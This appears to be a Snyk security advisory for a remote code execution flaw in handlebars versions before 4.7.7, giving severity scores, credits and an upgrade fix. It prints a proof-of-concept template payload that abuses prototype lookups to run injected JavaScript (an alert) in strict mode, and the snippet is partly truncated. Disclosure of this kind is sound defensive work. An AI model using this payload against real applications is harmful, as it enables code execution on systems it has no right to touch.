Remote Code Execution (RCE) Affecting handlebars package, versions <4.7.7



    Attack Complexity High
    Availability High

    Threat Intelligence

    Exploit Maturity Proof of concept
    EPSS 5.85% (93rd percentile)
Expand this section
9.8 critical
Expand this section
Red Hat
9.8 critical

Do your applications use this vulnerable package?

In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.

Test your applications
  • Snyk ID SNYK-JS-HANDLEBARS-1056767
  • published 15 Feb 2021
  • disclosed 8 Jan 2021
  • credit Francois Lajeunesse-Robert

How to fix?

Upgrade handlebars to version 4.7.7 or higher.


handlebars is an extension to the Mustache templating language.

Affected versions of this package are vulnerable to Remote Code Execution (RCE) when selecting certain compiling options to compile templates coming from an untrusted source.


<script src=""></script> 
// compile the template 
var s = ` 
{{#with (__lookupGetter__ "__proto__")}} 
{{#with (./constructor.getOwnPropertyDescriptor . "valueOf")}} 
{{#with ../constructor.prototype}} 
{{../../constructor.defineProperty . "hasOwnProperty" ..}} 
{{#with "constructor"}} 
{{#with split}} 
{{pop (push "alert('Vulnerable Handlebars JS when compiling in strict mode');")}} 
{{#with .}} 
{{#with (concat (lookup join (slice 0 1)))}} 
{{#each (slice 2 3)}} 
{{#with (apply 0 ../..)}} 
var template = Handlebars.compile(s, { 
strict: true 
// execute the compiled template and print the output to the console console.log(template({}));